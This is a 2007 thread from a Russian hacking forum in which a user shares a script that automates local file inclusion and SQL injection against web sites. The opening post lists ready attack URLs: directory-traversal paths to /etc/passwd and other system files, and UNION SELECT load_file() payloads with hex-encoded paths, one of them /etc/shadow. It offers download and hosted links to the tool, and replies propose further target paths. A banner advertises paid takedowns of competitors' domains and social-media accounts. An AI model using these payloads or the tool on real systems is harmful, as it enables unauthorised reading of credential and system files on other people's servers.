УСТРАНЕНИЕ КОНКУРЕНТОВ. БЛОКИРОВКА ДОМЕНОВ, БЛОКИРОВКА ИНСТАГРАМ/ТЕЛЕГРАМ И ДРУГОЕ. ПРОВЕРЕННЫЙ СЕЛЛЕР.

ANTICHAT — форум по информационной безопасности, OSINT и технологиям

ANTICHAT — русскоязычное сообщество по безопасности, OSINT и программированию. Форум ранее работал на доменах antichat.ru, antichat.com и antichat.club, и теперь снова доступен на новом адресе — forum.antichat.xyz.
Форум восстановлен и продолжает развитие: доступны архивные темы, добавляются новые обсуждения и материалы.
⚠️ Старые аккаунты восстановить невозможно — необходимо зарегистрироваться заново.

		Форум АНТИЧАТ > Безопасность и Уязвимости > Уязвимости
LogS--ToolS

Страница 1 из 2

Опции темы

Поиск в этой теме

Опции просмотра

LogS--ToolS

23.09.2007, 17:54

NOmeR1

Познавший АНТИЧАТ

Регистрация: 02.06.2006

Сообщений: 1,188

Провел на форуме:
6023777

Репутация: 2642

Отправить сообщение для NOmeR1 с помощью ICQ

LogS--ToolS

Написал скрипт, который автоматически ищет логи, при локальном инклуде и SQL инъекции.
В файл dirs.txt записываем диры, которые надо проверить.

Download:
- [0x57656246696C652E7275]
- [0xSLIL.0xRU]

Скрипт может не работать если:
- Не выводится ошибка
- Вы неверно ввели урл

Сокеты не нужны.

Подходящий хостинг - ueuo.com

Примеры:

1. PHP-Inj:
- Пишем url: http://site.ru/include.php?file=[php]
- Результат

Цитата:

http://site.ru/include.php?file=../../../../../../../../../../../../etc/passwd
http://site.ru/include.php?file=../../../../../../../../../../../../etc/hosts
http://site.ru/include.php?file=../../../../../../../../../../../../etc/ftpusers
http://site.ru/include.php?file=../../../../../../../../../../../../etc/syslog.conf
http://site.ru/include.php?file=../../../../../../../../../../../../etc/services
http://site.ru/include.php?file=../../../../../../../../../../../../etc/group
http://site.ru/include.php?file=../../../../../../../../../../../../etc/bash.bashrc
http://site.ru/include.php?file=../../../../../../../../../../../../etc/profile
http://site.ru/include.php?file=../../../../../../../../../../../../etc/skel/.bashrc

2. SQL-Inj:
- Пишем url: http://site.ru/users.php?id=[sql]
- Колумнов: 12
- Ставим запрос на: 7
- Результат

Цитата:

http://site.ru/users.php?id=-1+union+select+1,2,3,4,5,6,load_file(0x2f6574632f7 06173737764),8,9,10,11,12
http://site.ru/users.php?id=-1+union+select+1,2,3,4,5,6,load_file(0x2f6574632f7 36861646f77),8,9,10,11,12
http://site.ru/users.php?id=-1+union+select+1,2,3,4,5,6,load_file(0x2f6574632f6 86f737473),8,9,10,11,12
http://site.ru/users.php?id=-1+union+select+1,2,3,4,5,6,load_file(0x2f6574632f7 365727669636573),8,9,10,11,12
http://site.ru/users.php?id=-1+union+select+1,2,3,4,5,6,load_file(0x2f6574632f6 7726f7570),8,9,10,11,12
http://site.ru/users.php?id=-1+union+select+1,2,3,4,5,6,load_file(0x2f6574632f6 e6574776f726b73),8,9,10,11,12
http://site.ru/users.php?id=-1+union+select+1,2,3,4,5,6,load_file(0x2f6574632f7 0726f66696c65),8,9,10,11,12
http://site.ru/users.php?id=-1+union+select+1,2,3,4,5,6,load_file(0x2f6574632f7 36b656c2f2e626173687263),8,9,10,11,12

Смотрите также
- Mail.Ru BruteForce
- Rambler.Ru

Последний раз редактировалось NOmeR1; 30.10.2007 в 00:40..

25.09.2007, 16:17

NOmeR1

Познавший АНТИЧАТ

Регистрация: 02.06.2006

Сообщений: 1,188

Провел на форуме:
6023777

Репутация: 2642

Обновил скрипт, теперь вместо [url] надо писать [php], так легче, имхо.
Исправил ошибку, когда выдавались неверные данные ну и ещё одну небольшую ошибку.
Если кому лень качать, искать хост и т.д., я залил - http://x0.6te.net/injection.php

26.09.2007, 16:26

BlackCats

Постоянный

Регистрация: 01.02.2006

Сообщений: 970

Провел на форуме:
9254548

Репутация: 1942

удобный скриптик.. не нужно самому подставлять..

26.09.2007, 16:49

~~guest3297~~

Banned

Регистрация: 27.06.2006

Сообщений: 1,614

Провел на форуме:
3887520

Репутация: 2996

номер 1 не ленись составь нормальный список, на конфиги и так далее таких тулз дофига а словарей нету...

26.09.2007, 17:41

NOmeR1

Познавший АНТИЧАТ

Регистрация: 02.06.2006

Сообщений: 1,188

Провел на форуме:
6023777

Репутация: 2642

Цитата:

Сообщение от [ cash ]

номер 1 не ленись составь нормальный список, на конфиги и так далее таких тулз дофига а словарей нету...

Таких тулз - 0 не считая мою, тем более на PHP. И чем тебе не нравится список логов?

Последний раз редактировалось NOmeR1; 26.09.2007 в 17:48..

26.09.2007, 18:08

Светлый

Участник форума

Регистрация: 28.06.2007

Сообщений: 221

Провел на форуме:
836479

Репутация: 135

неплохо было бы дефолтные виндовые пути вписать

26.09.2007, 21:19

$n@ke

Постоянный

Регистрация: 18.09.2006

Сообщений: 867

Провел на форуме:
2805813

Репутация: 1396

1, норм прога...вот Кеш неплохую идею подогнал!

Светлый, о каких путях на винде ты говоришь??? $systemdir ??

26.09.2007, 21:25

~~guest3297~~

Banned

Регистрация: 27.06.2006

Сообщений: 1,614

Провел на форуме:
3887520

Репутация: 2996

C:\boot.ini

26.09.2007, 21:50

The_HuliGun

Участник форума

Регистрация: 19.05.2007

Сообщений: 228

Провел на форуме:
4325663

Репутация: 240

Отправить сообщение для The_HuliGun с помощью ICQ

Цитата:

Таких тулз - 0 не считая мою

Уверен?
http://forum.antichat.ru/thread45289.html

#10

26.09.2007, 21:52

~~guest3297~~

Banned

Регистрация: 27.06.2006

Сообщений: 1,614

Провел на форуме:
3887520

Репутация: 2996

Цитата:

Таких тулз - 0 не считая мою, тем более на Php. И чем тебе не нравится список логов?

Таких тулз у меня компе минимум 6 причем есть те которые работают гараздо лучше.

Страница 1 из 2

« Предыдущая тема | Следующая тема »

Похожие темы
Тема	Автор	Раздел	Ответов	Последнее сообщение
Сборник полезных прог! (Must Have!)	PEPSICOLA	Soft - Windows	388	11.05.2010 12:27
XSS в Online tools от puremango	BlackCats	Уязвимости	1	29.09.2007 00:20
Steps To Deface A Webpage (About Defacers)	bxN5	Forum for discussion of ANTICHAT	3	11.03.2007 03:04

Здесь присутствуют: 1 (пользователей: 0 , гостей: 1)

Быстрый переход